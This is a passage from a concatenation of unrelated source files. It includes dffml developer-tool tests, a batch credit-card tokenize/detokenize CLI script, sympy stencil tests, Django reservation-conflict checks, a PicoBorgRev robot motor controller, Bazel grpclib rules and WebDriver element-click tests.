            f"Version {VERSION} of dffml already on PyPi",
        )

    async def test_okay(self):
        """A version absent from PyPi triggers the build-and-upload sequence."""
        # NOTE(review): rebinding the module-global VERSION leaks into any
        # test that runs after this one in the same process -- confirm intended.
        global VERSION
        VERSION = "0.0.0"
        for plugin in [".", "model/scikit"]:
            stdout = io.StringIO()
            with self.subTest(plugin=plugin):
                with unittest.mock.patch(
                    "asyncio.create_subprocess_exec", new=mkexec()
                ), unittest.mock.patch(
                    "urllib.request.urlopen", new=fake_urlopen
                ), contextlib.redirect_stdout(
                    stdout
                ):
                    await Develop.cli("release", plugin)
                self.assertEqual(
                    stdout.getvalue().strip(),
                    inspect.cleandoc(
                        f"""
                        $ git archive --format=tar HEAD
                        $ {sys.executable} setup.py sdist
                        $ {sys.executable} setup.py bdist_wheel
                        $ {sys.executable} -m twine upload dist/*
                        """
                    ),
                )
class TestSetupPyVersion(AsyncTestCase):
    """Tests for ``dev setuppy version``: extracting VERSION from a setup.py."""

    async def test_success(self):
        """A VERSION assignment in the file is printed to stdout."""
        stdout = io.StringIO()
        with contextlib.redirect_stdout(stdout):
            await Develop.cli(
                "setuppy",
                "version",
                self.mktempfile(text='VERSION = "0.0.42"'),
            )
        self.assertEqual("0.0.42", stdout.getvalue().strip())

    async def test_filenot_found(self):
        """A file with no VERSION assignment raises VersionNotFoundError.

        NOTE(review): despite the name, this exercises a file *without* a
        VERSION line, not a missing file.
        """
        with self.assertRaises(VersionNotFoundError):
            await Develop.cli(
                "setuppy",
                "version",
                self.mktempfile(text='FEEDFACE = "0.0.42"'),
            ),  # NOTE(review): trailing comma makes this a no-op tuple
class TestBumpPackages(AsyncTestCase):
    """Tests for BumpPackages.bump_version semantic-version arithmetic."""

    async def test_bump_version(self):
        self.assertEqual(BumpPackages.bump_version("1.2.3", "5.6.7"), "6.8.10")

    async def test_bump_version_original_with_rc(self):
        # An rc suffix on the original is dropped when the increment has none.
        self.assertEqual(
            BumpPackages.bump_version("1.2.3-rc0", "5.6.7"), "6.8.10"
        )

    async def test_bump_version_increment_with_rc(self):
        self.assertEqual(
            BumpPackages.bump_version("1.2.3", "5.6.7-rc0"), "6.8.10-rc0"
        )

    async def test_bump_version_both_with_rc(self):
        # rc numbers are themselves added together.
        self.assertEqual(
            BumpPackages.bump_version("1.2.3-rc1", "5.6.7-rc2"), "6.8.10-rc3"
        )

    async def test_bump_version_zero(self):
        # A "Z" component zeroes the corresponding part of the result.
        self.assertEqual(
            BumpPackages.bump_version("1.2.3-rc1", "5.6.Z"), "6.8.0"
        )

    async def test_bump_version_original_violates_semantic(self):
        # BUG FIX: raw strings so "\." are literal regex escapes rather than
        # invalid string-literal escapes (DeprecationWarning, pycodestyle W605).
        with self.assertRaisesRegex(RCMissingHyphen, r"original.*1\.2\.3rc1"):
            BumpPackages.bump_version("1.2.3rc1", "0.0.0")

    async def test_bump_version_increment_violates_semantic(self):
        with self.assertRaisesRegex(RCMissingHyphen, r"increment.*5\.6\.7rc2"):
            BumpPackages.bump_version("1.2.3-rc1", "5.6.7rc2")
class TestExport(AsyncTestCase):
    """Tests for ``dev export``: dumping a DataFlow as JSON."""

    async def test_run(self):
        """Exported JSON must round-trip back into a DataFlow."""
        stdout = io.BytesIO()
        # Capture the raw bytes written to sys.stdout.buffer.
        with unittest.mock.patch("sys.stdout.buffer.write", new=stdout.write):
            await Export(
                export="tests.test_df:DATAFLOW", not_linked=False
            ).run()
        exported = json.loads(stdout.getvalue())
        # Raises if the exported document is not a valid DataFlow.
        DataFlow._fromdict(**exported)
class TestRun(AsyncTestCase):
    """Tests for ``dev run``: executing a single operation from the CLI."""

    async def test_run(self):
        """Run db_query_create_table against a throwaway sqlite database."""
        with tempfile.TemporaryDirectory() as tempdir:
            await Run.cli(
                "dffml.operation.db:db_query_create_table",
                "-table_name",
                "FEEDFACE",
                "-cols",
                json.dumps({"DEADBEEF": "text"}),
                "-config-database",
                "sqlite",
                "-config-database-filename",
                os.path.join(tempdir, "sqlite_database.db"),
                "-log",
                "debug",
            )
class TestInstall(AsyncTestCase):
    """Tests for plugin dependency checking in ``dev install``."""

    async def test_dep_check(self):
        """A plugin whose dependency check returns False must be reported."""
        with self.assertRaisesRegex(
            MissingDependenciesError,
            inspect.cleandoc(
                """
                The following plugins have unmet dependencies and could not be installed
                model/vowpalWabbit
                feedface
                Install missing dependencies and re-run plugin install, or skip with
                -skip model/vowpalWabbit
                """
            ),
        ):
            # The lambda is the (failing) dependency-presence check.
            Install.dep_check(
                {("model", "vowpalWabbit"): {"feedface": lambda: False}}, []
            )
class TestMakeDocs(AsyncTestCase):
    """Tests for ``dev docs``: building the documentation tree."""

    # Repository root, two directory levels above this test file.
    root = pathlib.Path(__file__).parents[2]
    docs_root = root / "docs"
    # (symlink path under docs/, target path relative to repo root) pairs.
    symlinks_to_chk = [
        (("changelog.md",), ("CHANGELOG.md",)),
        (("shouldi.md",), ("examples", "shouldi", "README.md",)),
        (("swportal.rst",), ("examples", "swportal", "README.rst",)),
        (
            ("contributing", "consoletest.md",),
            ("dffml", "util", "testing", "consoletest", "README.md",),
        ),
        (("plugins", "service", "http",), ("service", "http", "docs",),),
    ]
    # Static assets expected to be copied into the build target.
    files_to_check = [
        (file_name,) for file_name in os.listdir(docs_root / "images")
    ] + [("_static", "copybutton.js",), (".nojekyll",)]

    async def test_files(self):
        """Symlinks and static files must exist after a docs build."""
        if not is_develop("dffml"):
            self.skipTest("dffml not installed in development mode")
        with tempfile.TemporaryDirectory() as tempdir:
            with unittest.mock.patch(
                "asyncio.create_subprocess_exec", new=mkexec()
            ):
                await Develop.cli("docs", "-target", tempdir)
            for symlink, source in self.symlinks_to_chk:
                symlink_path = self.docs_root.joinpath(*symlink)
                source_path = self.root.joinpath(*source)
                self.assertTrue(symlink_path.exists())
                self.assertTrue(symlink_path.resolve() == source_path)
            for file_name in self.files_to_check:
                file_path = pathlib.Path(tempdir).joinpath(*file_name)
                self.assertTrue(file_path.exists())

    async def test_cmd_seq(self):
        """The docs build must invoke the expected command sequence."""
        if not is_develop("dffml"):
            self.skipTest("dffml not installed in development mode")
        stdout = io.StringIO()
        with unittest.mock.patch(
            "asyncio.create_subprocess_exec", new=mkexec()
        ), contextlib.redirect_stdout(
            stdout
        ), tempfile.TemporaryDirectory() as tempdir:
            await Develop.cli("docs", "-target", tempdir)
        self.assertEqual(
            stdout.getvalue().strip(),
            inspect.cleandoc(
                f"""
                $ {sys.executable} {self.root}/scripts/docs.py
                $ {sys.executable} {self.root}/scripts/docs_api.py
                $ sphinx-build -W -b html docs {tempdir}
                """
            ),
        )
class TestLintCommits(AsyncTestCase):
    """Tests for LintCommits commit-message validation."""

    LintCommitsObj = LintCommits()
    # Messages that follow the "area: subarea: Description" convention.
    valid_commits = [
        "docs: contributing: editors: vscode: Shorten title",
        "df: memory: Log on instance creation with given config",
        "source: file: Change label to tag",
        "model: scikit: Use make_config_numpy",
        "cli: dataflow: Merge seed arrays",
        "tests : service : dev : updated test for LintCommits",
        "shouldi: Use high level run",
        "shouldi: tests: cli: Include node",
    ]
    # Messages the linter must reject.
    invalid_commits = [
        "service: http: routes: Default to setting no-cache on all respones",
        "docs: contributing: consoletest: README: Add documentation",
        "style: Fixed JS API newline",
        "cleanup: Fix importing by using importlib.import_module",
        "tests : service : test_dev : updated test for LintCommits",
    ]

    async def fake_get_all_exts(self):
        """Stub for LintCommits._get_all_exts: file extensions present in the repo."""
        return {
            "",
            ".py",
            ".mp4",
            ".js",
            ".toml",
            ".ini",
            ".csv",
            ".md",
            ".json",
            ".in",
            ".txt",
            ".yaml",
            ".cfg",
            ".css",
            ".svg",
            ".html",
            ".jpg",
            ".yml",
            ".gif",
            ".ipynb",
            ".rst",
            ".sh",
            ".nblink",
            ".png",
            ".Dockerfile",
            ".pdf",
        }

    async def test_should_validate(self):
        """Every message in valid_commits must pass validation."""
        with unittest.mock.patch(
            "dffml.service.dev.LintCommits._get_all_exts",
            self.fake_get_all_exts,
        ):
            self.assertTrue(
                all(
                    [
                        await self.LintCommitsObj.validate_commit_msg(msg)
                        for msg in self.valid_commits
                    ]
                )
            )

    async def test_shouldnot_validate(self):
        """Every message in invalid_commits must fail validation."""
        with unittest.mock.patch(
            "dffml.service.dev.LintCommits._get_all_exts",
            self.fake_get_all_exts,
        ):
            self.assertTrue(
                not any(
                    [
                        await self.LintCommitsObj.validate_commit_msg(msg)
                        for msg in self.invalid_commits
                    ]
                )
            )
|
#!/bin/env python3
"""
This is an example script to tokenize or detokenize batch data using CSV file.
Usage: batch_tokenize_and_detokenize.py [options]
Tokenize or Detokenize using CSV file. Please make sure you have updated
envvars file
Options:
-h, --help show this help message and exit
--csv_file_path=CSV_FILE_PATH
Specify the path of CSV file, example
/home/user/abc.csv
--auth_token=AUTH_TOKEN
Specify the auth token for Google Cloud authentication
--project_id=PROJECT_ID
Specify GCP project id
--app_url=APP_URL Specify App URL
--transformation_type=TRANSFORMATION_TYPE
Specify if you want to tokenize or detokenize
Output:
In case of tokenizer, output file is csv_files/batch_tokenize_sample_csv_output.csv
In case of detokenizer, output file is csv_files/batch_detokenize_sample_csv_output.csv
"""
import json
import optparse
import requests
import sys
import csv
def parse_csv_and_send_tokenize_request(csv_file_path, auth_token, project_id, app_url):
    """Read the input CSV (skipping its header) and POST each row to the
    tokenizer service via send_tokenize_request."""
    with open(csv_file_path, "r") as csvfile:
        reader = csv.reader(csvfile)
        next(reader)  # skip the header row
        for record in reader:
            payload = {
                "cc": record[0],
                "mm": record[1],
                "yyyy": record[2],
                "user_id": record[3],
                "project_id": project_id,
            }
            send_tokenize_request(auth_token, payload, app_url)
def send_tokenize_request(auth_token, data_dic, app_url):
    """POST one record to the tokenizer service and append the result to the
    output CSV.

    data_dic is sent as JSON with a bearer-token Authorization header. On a
    non-200 response the error is logged and a placeholder string is written
    in place of the token.
    """
    headers = {
        "authorization": "Bearer " + auth_token,
        "content-type": "application/json",
    }
    response = requests.request("POST", app_url, json=data_dic, headers=headers)
    if response.status_code == 200:
        resp_data = response.text
    else:
        resp_data = "Error while tokenizing"
        # BUG FIX: the original nested a print() call inside print(), which
        # printed the body separately and appended a stray "None". Log the
        # status and body once, matching send_detokenize_request.
        print(resp_data, response.status_code, response.text)
    write_tokenized_output_in_csv(data_dic, resp_data)
def write_tokenized_output_in_csv(data_dic, resp_data):
    """Append one tokenized record to the tokenizer output CSV."""
    row = [data_dic["cc"], data_dic["mm"], data_dic["yyyy"], data_dic["user_id"], resp_data]
    # Context manager guarantees the file is closed even if the write fails
    # (the original open/close pair leaked the handle on exception).
    with open("csv_files/batch_tokenize_sample_csv_output.csv", "a") as data_file:
        csv.writer(data_file).writerow(row)
def parse_csv_and_send_detokenize_request(csv_file_path, auth_token, project_id, app_url):
    """Read the input CSV (skipping its header) and POST each token row to the
    detokenizer service via send_detokenize_request."""
    with open(csv_file_path, "r") as csvfile:
        reader = csv.reader(csvfile)
        next(reader)  # skip the header row
        for record in reader:
            payload = {
                "user_id": record[0],
                "token": record[1],
                "project_id": project_id,
            }
            send_detokenize_request(auth_token, payload, app_url)
def send_detokenize_request(auth_token, data_dic, app_url):
    """POST one token record to the detokenizer service; on success write the
    decoded row to the output CSV, otherwise just log the failure."""
    headers = {
        "authorization": "Bearer " + auth_token,
        "content-type": "application/json",
    }
    response = requests.request("POST", app_url, json=data_dic, headers=headers)
    if response.status_code != 200:
        # Unlike tokenization, failed rows are only logged, never written out.
        print("Error while detokenizing", response.status_code, response.text)
        return
    write_detokenized_output_in_csv(data_dic, json.loads(response.content))
def write_detokenized_output_in_csv(data_dic, resp_data):
    """Append one detokenized record to the detokenizer output CSV."""
    row = [resp_data["cc"], resp_data["mm"], resp_data["yyyy"], data_dic["user_id"], data_dic["token"]]
    # Context manager guarantees the file is closed even if the write fails
    # (the original open/close pair leaked the handle on exception).
    with open("csv_files/batch_detokenize_sample_csv_output.csv", "a") as data_file:
        csv.writer(data_file).writerow(row)
def main(args):
    """Parse command-line options and run batch tokenization or detokenization.

    Raises Exception for any missing option; prints a usage hint for an
    unrecognized --transformation_type value.
    """
    parser = optparse.OptionParser(description="Tokenize or Detokenize using CSV file. Please make sure you have "
                                               "updated envvars file")
    parser.add_option('--csv_file_path', help="Specify the path of CSV file, example /home/user/abc.csv")
    parser.add_option('--auth_token', help="Specify the auth token for Google Cloud authentication")
    parser.add_option('--project_id', help="Specify GCP project id")
    parser.add_option('--app_url', help="Specify App URL")
    parser.add_option('--transformation_type', help="Specify if you want to tokenize or detokenize")
    options, remaining_args = parser.parse_args(args)

    def _require(value, name):
        # Every option is mandatory; fail fast with a descriptive message
        # (replaces five copy-pasted if/else checks).
        if not value:
            raise Exception('Invalid or missing --{} option'.format(name))
        return value

    csv_file_path = _require(options.csv_file_path, 'csv_file_path')
    auth_token = _require(options.auth_token, 'auth_token')
    project_id = _require(options.project_id, 'project_id')
    app_url = _require(options.app_url, 'app_url')
    transformation_type = _require(options.transformation_type, 'transformation_type')
    header = ["CC", "MM", "YYYY", "USER_ID", "TOKENIZED_DATA"]
    if transformation_type == "tokenize":
        _write_header("csv_files/batch_tokenize_sample_csv_output.csv", header)
        parse_csv_and_send_tokenize_request(csv_file_path, auth_token, project_id, app_url)
    elif transformation_type == "detokenize":
        _write_header("csv_files/batch_detokenize_sample_csv_output.csv", header)
        parse_csv_and_send_detokenize_request(csv_file_path, auth_token, project_id, app_url)
    else:
        # BUG FIX: the message previously said "tokenizer or detokenizer",
        # which are not the values this function actually accepts.
        print("Wrong transformation_type provided, transformation_type should be either tokenize or detokenize")


def _write_header(path, header):
    """Create (truncate) an output CSV and write its header row."""
    with open(path, "w") as data_file:
        csv.writer(data_file).writerow(header)
if __name__ == '__main__':
    # Drop the program name; pass only the real CLI arguments.
    main(sys.argv[1:])
|
"""Tests for distos.stencil
"""
import sys
sys.path.insert(1, "..")
import unittest
import sympy as sp
import numpy as np
import random
from dictos.spec import DEFAULT_INTERVAL, DEFAULT_DIFFERENTIAND
from dictos.stencil import (
create_coordinate_symbols,
create_differentiand_symbols,
to_subscript,
get_subscript,
)
from gen import random_string, random_int, STENCIL_HALF_WIDTH, MAX_SYMBOL_LENGTH
class StencilTest(unittest.TestCase):
    """Unit tests for dictos.stencil symbol-construction helpers."""

    def test_create_coordinate_symbols(self):
        """
        test suite for stencil.create_coordinate_symbols.

        1. it returns [a*h b*h c*h ...] when [a b c ...] is passed.
        2. it returns [a*dx b*dx c*dx ...] when [a b c ...] and 'dx' are passed.
        3. it raise error when empty list is passed.
        4. it raise error when at least a number in the stencil appears more than once.
        """
        # subtest 1
        # it returns [a*h b*h c*h ...] when [a b c ...] is passed.
        num = random_int(2, STENCIL_HALF_WIDTH)
        for n in num:
            with self.subTest(n):
                stencil = [i for i in range(n)]
                # Renamed so the hand-built list is `expected` and the
                # function result is `actual` (the original had them swapped).
                actual = create_coordinate_symbols(stencil)
                h = sp.symbols(DEFAULT_INTERVAL)
                expected = [i * h for i in range(n)]
                self.assertEqual(expected, actual)

        # subtest 2
        # it returns [a*dx b*dx c*dx ...] when [a b c ...] and 'dx' are passed.
        num = random_int(2, STENCIL_HALF_WIDTH)
        for n in num:
            with self.subTest(n):
                interval = random_string(random.randint(1, MAX_SYMBOL_LENGTH))
                h = sp.symbols(interval)
                stencil = [i for i in range(n)]
                actual = create_coordinate_symbols(stencil, interval=interval)
                expected = [i * h for i in range(n)]
                self.assertEqual(expected, actual)

        # subtest 3 & 4 are tested in `test_error_stencil` module

    def test_create_function_symbols(self):
        """
        test suite for stencil.create_differentiand_symbols
        (historically named create_function_symbols).

        1. it returns [f_{a}, f_{b}, f_{c}, ...] when [a*h, b*h, c*h, ...] is passed.
        2. it returns [g_{a}, g_{b}, g_{c}, ...] when [a*h, b*h, c*h, ...] and 'g' are passed.
        """
        # subtest 1
        # it returns [f_{a}, f_{b}, f_{c}, ...] when [a*h, b*h, c*h, ...] is passed.
        num = random_int(2, STENCIL_HALF_WIDTH)
        for n in num:
            with self.subTest(n):
                stencil = [i for i in range(n)]
                x = create_coordinate_symbols(stencil)
                actual = create_differentiand_symbols(x)
                f = DEFAULT_DIFFERENTIAND
                subscript = [to_subscript(i) for i in stencil]
                # Renamed from `str`, which shadowed the builtin.
                name_str = "".join([f + "_{" + s + "}" + " " for s in subscript])
                expected = sp.symbols(name_str)
                self.assertEqual(expected, actual)

                # staggered grid case
                stencil = [i / 2 for i in range(n)]
                x = create_coordinate_symbols(stencil)
                actual = create_differentiand_symbols(x)
                subscript = [to_subscript(i) for i in stencil]
                name_str = "".join([f + "_{" + s + "}" + " " for s in subscript])
                expected = sp.symbols(name_str)
                self.assertEqual(expected, actual)

        # subtest 2
        # it returns [g_{a}, g_{b}, g_{c}, ...] when [a*h, b*h, c*h, ...] and 'g' are passed.
        num = random_int(2, STENCIL_HALF_WIDTH)
        for n in num:
            with self.subTest(n):
                f = random_string(random.randint(1, MAX_SYMBOL_LENGTH))
                stencil = [i for i in range(n)]
                x = create_coordinate_symbols(stencil)
                actual = create_differentiand_symbols(x, differentiand=f)
                subscript = [to_subscript(i) for i in stencil]
                name_str = "".join([f + "_{" + s + "}" + " " for s in subscript])
                expected = sp.symbols(name_str)
                self.assertEqual(expected, actual)

                # staggered grid case
                stencil = [i / 2 for i in range(n)]
                x = create_coordinate_symbols(stencil)
                actual = create_differentiand_symbols(x, differentiand=f)
                subscript = [to_subscript(i) for i in stencil]
                name_str = "".join([f + "_{" + s + "}" + " " for s in subscript])
                expected = sp.symbols(name_str)
                self.assertEqual(expected, actual)

    def test_to_subscript(self):
        """
        test suite for stencil.to_subscript.
        """
        # Integers (plain Python ints).
        num = random_int(-20, 20)
        for n in num:
            with self.subTest(f"primitive variable {n} to subscript"):
                expected = str(n)
                actual = to_subscript(n)
                self.assertEqual(expected, actual)

        # Half-integers (staggered-grid points), zero excluded.
        num = random_int(-20, 20, exclude=[0])
        for n in num:
            f = (abs(n) - 0.5) * np.sign(n)
            with self.subTest(f"primitive variable {f} to subscript"):
                expected = str(f)
                actual = to_subscript(f)
                self.assertEqual(expected, actual)

        # Same cases again as sympy Numbers.
        num = random_int(-20, 20)
        for n in num:
            with self.subTest(f"sympy number {n} to subscript"):
                expected = str(n)
                actual = to_subscript(sp.Number(n))
                self.assertEqual(expected, actual)

        num = random_int(-20, 20, exclude=[0])
        for n in num:
            f = (abs(n) - 0.5) * np.sign(n)
            with self.subTest(f"sympy number {f} to subscript"):
                expected = str(f)
                actual = to_subscript(sp.Number(f))
                self.assertEqual(expected, actual)

    def test_get_subscript(self):
        """
        test suite for stencil.get_subscript.
        """
        for half_width in range(1, 11):
            with self.subTest(f"get subscript {(half_width * 2 + 1)}-point stencil"):
                stencil = [to_subscript(i) for i in range(-half_width, half_width + 1)]
                expected = stencil
                f = DEFAULT_DIFFERENTIAND
                subscript = [
                    to_subscript(i) for i in range(-half_width, half_width + 1)
                ]
                # Renamed from `str`, which shadowed the builtin.
                name_str = "".join([f + "_{" + s + "}" + " " for s in subscript])
                f_set = sp.symbols(name_str)
                actual = []
                for f in f_set:
                    actual.append(get_subscript(f))
                self.assertEqual(expected, actual)
if __name__ == "__main__":
    # Run the suite when this file is executed directly.
    unittest.main()
|
from setuptools import setup

# Package metadata for the stormtrooper distribution.
# NOTE(review): `url` looks like a placeholder (bare "bitbucket.com") --
# confirm the real repository URL.
setup(name='stormtrooper',
      version='0.0.1',
      description='Report trooper status and geolocation using homomorphic encryption',
      url='bitbucket.com',
      author='Jonathan Pinto Barbosa',
      author_email='jonathanpbarbosa@gmail.com',
      license='MIT',
      packages=['stormtrooper'],
      install_requires=[],
      zip_safe=False)
|
import cffi

# Expose a C constant to Python: compile a tiny C snippet and read back
# sizeof(long long int) on this platform.
ffi = cffi.FFI()
ffi.cdef("const int mysize;")
# NOTE(review): FFI.verify() is deprecated in favor of set_source()/compile()
# in modern cffi releases -- confirm the pinned cffi version still supports it.
lib = ffi.verify("const int mysize = sizeof(long long int);")
print(lib.mysize)
|
from .models import Resource, Reservation
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
#
# Conflict
#
class Conflict():
    """Pairs a ValidationError with the reservations that triggered it."""

    def __init__(self, conflicting_reservations, val_error):
        # Reservations overlapping the requested slot; empty for
        # availability-window errors.
        self.conflicting_reservations = conflicting_reservations
        self.val_error = val_error
#
# get_conflicting_reservations
#
def get_conflicting_reservations(new_reservation, reservation_list):
    """Return reservations in reservation_list whose slot overlaps new_reservation.

    Two slots [start, end) overlap iff each starts before the other ends.
    This single check subsumes the original three cases (start inside,
    end inside, full encompassment) and additionally covers identical
    slots. It assumes end_time > start_time, which the availability
    validation elsewhere enforces ("reservation must be at least 1 minute").
    """
    start_time = new_reservation.start_time
    end_time = new_reservation.end_time
    return [
        reservation
        for reservation in reservation_list
        if start_time < reservation.end_time and end_time > reservation.start_time
    ]
#
# get_conflicts
#
def get_conflicts(new_reservation):
    """Validate new_reservation against the resource availability window, the
    owner's other reservations, and the resource's capacity.

    Returns a list of Conflict objects; empty when the reservation is valid.
    """
    start_time = new_reservation.start_time
    end_time = new_reservation.end_time
    resource = new_reservation.resource
    conflict_list = []
    # 1. Check if reservation in resource availability window
    # error: start time not in resource availability window
    if start_time < resource.start_time or start_time > resource.end_time:
        conflict_list.append(Conflict([], ValidationError(
            _('Start time outside resource availability window.'),
            code='invalid')))
    # error: end time not in resource availability window
    # <= : reservation must be at least 1 minute
    if end_time <= resource.start_time or end_time > resource.end_time:
        conflict_list.append(Conflict([], ValidationError(
            _('End time outside resource availability window.'),
            code='invalid')))
    # 2. Check that user doesn't have another reservation that conflicts with this time slot (self-conflict)
    global_self_reservations = Reservation.objects.filter(owner=new_reservation.owner)
    global_self_conflicts = get_conflicting_reservations(new_reservation, global_self_reservations)
    total_global_self_conflicts = len(global_self_conflicts)
    if total_global_self_conflicts > 0:
        conflict_list.append(Conflict(global_self_conflicts, ValidationError(
            _('You have an existing reservation that conflicts with the requested time slot.'),
            code='invalid')))
    # 3. Check reservation doesn't conflict with other reservations for this resource
    # filter self conflicts with this resource as we already returned them with global_conflicts
    local_other_reservations = Reservation.objects.filter(resource=resource).exclude(owner=new_reservation.owner)
    local_other_conflicts = get_conflicting_reservations(new_reservation, local_other_reservations)
    local_self_reservations = Reservation.objects.filter(resource=resource, owner=new_reservation.owner)
    local_self_conflicts = get_conflicting_reservations(new_reservation, local_self_reservations)
    total_local_other_conflicts = len(local_other_conflicts)
    total_local_self_conflicts = len(local_self_conflicts)
    # Capacity check counts both the owner's and others' overlapping reservations.
    total_local_conflicts = total_local_other_conflicts + total_local_self_conflicts
    if total_local_conflicts >= resource.capacity:
        conflict_list.append(Conflict(local_other_conflicts, ValidationError(
            _('Resource at max capacity for requested time slot.'),
            code='invalid')))
    return conflict_list
|
from picoborgrev.PicoBorgRev import PicoBorgRev
from calibrate_tracks import get_char
import sys
class basic_controls():
    """Minimal convenience wrapper around the PicoBorgRev motor controller."""
    def __init__(self):
        self.ctl = PicoBorgRev()
        self.ctl.Init()
    def go(self, power=0.25):
        # Drive both motors forward at the given power.
        self.ctl.SetMotors(power)
    def stop(self):
        self.ctl.SetMotors(0)
    def right(self, power=0.5):
        # NOTE(review): assumes motor 1 drives the right track -- confirm wiring.
        self.ctl.SetMotor1(power)
    def left(self, power=0.5):
        self.ctl.SetMotor2(power)
    def back(self, power=-0.25):
        # Negative power reverses both motors.
        self.ctl.SetMotors(power)
if __name__ == '__main__':
    # Interactive differential-drive controller. NOTE: Python 2 syntax
    # (print statements, raw_input) -- do not run under Python 3.
    print "Simple movement controller. Press w/s to increase/decrease left track speed, o/k for the right.\
    Press <space> to stop the robot, or q to end the program to stop the robot"
    raw_input("\nPress enter key to continue, or ctrl-c to quit now.")
    pico = PicoBorgRev()
    pico.Init()
    R_SPEED = 0
    L_SPEED = 0
    SPEED_INCREMENT = 0.1
    # Trim applied to the right motor, presumably to compensate for a drive
    # mismatch -- TODO confirm against calibration.
    offset = -0.05
    while True:
        try:
            pico.SetMotor1(R_SPEED + offset)
            pico.SetMotor2(L_SPEED)
            key = get_char()
            if key == 'w' or key == 'W':
                L_SPEED += SPEED_INCREMENT
            elif key == 's' or key == 'S':
                L_SPEED -= SPEED_INCREMENT
            # Separate if-chain: right-track keys are handled independently
            # of the left-track keys above.
            if key == 'o' or key == 'O':
                R_SPEED += SPEED_INCREMENT
            elif key == 'k' or key == 'K':
                R_SPEED -= SPEED_INCREMENT
            elif key == ' ':
                L_SPEED = 0
                R_SPEED = 0
            elif key == 'q':
                # Reuse the ctrl-c path below to stop motors and exit.
                raise KeyboardInterrupt
            print "Left: {:+.2f}\tRight: {:+.2f}".format(L_SPEED, R_SPEED)
        except KeyboardInterrupt:
            pico.SetMotors(0)
            print "Done."
            sys.exit(0)
|
load("@build_stack_rules_proto//:plugin.bzl", "ProtoPluginInfo")
load("@protobuf_py_deps//:requirements.bzl", protobuf_requirements = "all_requirements")
load("@grpc_py_deps//:requirements.bzl", grpc_requirements = "all_requirements")
load(
"@build_stack_rules_proto//:aspect.bzl",
"ProtoLibraryAspectNodeInfo",
"proto_compile_aspect_attrs",
"proto_compile_aspect_impl",
"proto_compile_attrs",
"proto_compile_impl",
)
# Aspect that walks `deps` and runs protoc with the python and grpc_python
# plugins on every proto_library in the dependency graph.
python_grpclib_compile_aspect = aspect(
    attr_aspects = ["deps"],
    attrs = dict(
        proto_compile_aspect_attrs,
        _plugins = attr.label_list(
            doc = "List of protoc plugins to apply",
            providers = [ProtoPluginInfo],
            default = [
                str(Label("@build_stack_rules_proto//python:python")),
                str(Label("//:grpc_python")),
            ],
        ),
    ),
    provides = [
        "proto_compile",
        ProtoLibraryAspectNodeInfo,
    ],
    implementation = proto_compile_aspect_impl,
)
# Rule driving the aspect above; collects the generated sources from deps.
_rule = rule(
    attrs = dict(
        proto_compile_attrs,
        deps = attr.label_list(
            mandatory = True,
            providers = [
                ProtoInfo,
                "proto_compile",
                ProtoLibraryAspectNodeInfo,
            ],
            aspects = [python_grpclib_compile_aspect],
        ),
    ),
    implementation = proto_compile_impl,
)
def python_grpclib_compile(**kwargs):
    # Thin macro over _rule: stringify verbose/plugin_options because rule
    # attributes only accept string values.
    _rule(
        verbose_string = "%s" % kwargs.get("verbose", 0),
        plugin_options_string = ";".join(kwargs.get("plugin_options", [])),
        **kwargs
    )
def python_grpclib_library(**kwargs):
    """Compile proto deps to grpclib Python sources and wrap them in a py_library."""
    name = kwargs.get("name")
    deps = kwargs.get("deps")
    visibility = kwargs.get("visibility")
    compile_target = name + "_pb"
    python_grpclib_compile(
        name = compile_target,
        transitive = kwargs.pop("transitive", True),
        transitivity = kwargs.pop("transitivity", {}),
        verbose = kwargs.pop("verbose", 0),
        visibility = visibility,
        deps = deps,
    )
    py_library(
        name = name,
        srcs = [compile_target],
        # This magically adds REPOSITORY_NAME/PACKAGE_NAME/{name_pb} to PYTHONPATH
        imports = [compile_target],
        visibility = visibility,
        deps = depset(protobuf_requirements + grpc_requirements).to_list(),
    )
|
import pytest
from tests.support.asserts import assert_error, assert_success
def element_click(session, element):
    """Issue the WebDriver Element Click command for *element* and return the response."""
    endpoint = "session/{session_id}/element/{element_id}/click".format(
        session_id=session.session_id, element_id=element.id)
    return session.transport.send("POST", endpoint)
def test_display_none(session, inline):
    """A display:none button is not interactable."""
    session.url = inline("""<button style="display: none">foobar</button>""")
    button = session.find.css("button", all=False)
    assert_error(element_click(session, button), "element not interactable")
def test_visibility_hidden(session, inline):
    """A visibility:hidden button is not interactable."""
    session.url = inline("""<button style="visibility: hidden">foobar</button>""")
    button = session.find.css("button", all=False)
    assert_error(element_click(session, button), "element not interactable")
def test_hidden(session, inline):
    """A button with the `hidden` attribute is not interactable."""
    session.url = inline("<button hidden>foobar</button>")
    button = session.find.css("button", all=False)
    assert_error(element_click(session, button), "element not interactable")
def test_disabled(session, inline):
    """Clicking a disabled (but visible) button succeeds per the WebDriver spec."""
    session.url = inline("""<button disabled>foobar</button>""")
    button = session.find.css("button", all=False)
    assert_success(element_click(session, button))
@pytest.mark.parametrize("transform", ["translate(-100px, -100px)", "rotate(50deg)"])
def test_element_not_interactable_css_transform(session, inline, transform):
    """An input moved out of reach by a CSS transform is not interactable."""
    session.url = inline("""
        <div style="width: 500px; height: 100px;
            background-color: blue; transform: {transform};">
            <input type=button>
        </div>""".format(transform=transform))
    target = session.find.css("input", all=False)
    assert_error(element_click(session, target), "element not interactable")
def test_element_not_interactable_out_of_view(session, inline):
    """An input positioned a full viewport above the page is not interactable."""
    session.url = inline("""
        <style>
        input {
          position: absolute;
          margin-top: -100vh;
          background: red;
        }
        </style>

        <input>
        """)
    target = session.find.css("input", all=False)
    assert_error(element_click(session, target), "element not interactable")
@pytest.mark.parametrize("tag_name", ["div", "span"])
def test_zero_sized_element(session, inline, tag_name):
    """An empty element with zero rendered size is not interactable."""
    session.url = inline("<{0}></{0}>".format(tag_name))
    target = session.find.css(tag_name, all=False)
    assert_error(element_click(session, target), "element not interactable")
def test_element_intercepted(session, inline):
    """A full-screen overlay on top of the button intercepts the click."""
    session.url = inline("""
        <style>
        div {
          position: absolute;
          height: 100vh;
          width: 100vh;
          background: blue;
          top: 0;
          left: 0;
        }
        </style>

        <input type=button value=Roger>
        <div></div>
        """)
    target = session.find.css("input", all=False)
    assert_error(element_click(session, target), "element click intercepted")
def test_element_intercepted_no_pointer_events(session, inline):
    """pointer-events:none makes the click land elsewhere, so it is intercepted."""
    session.url = inline("""<input type=button value=Roger style="pointer-events: none">""")
    target = session.find.css("input", all=False)
    assert_error(element_click(session, target), "element click intercepted")
def test_element_not_visible_overflow_hidden(session, inline):
    """An input clipped away by an overflow:hidden ancestor is not interactable."""
    session.url = inline("""
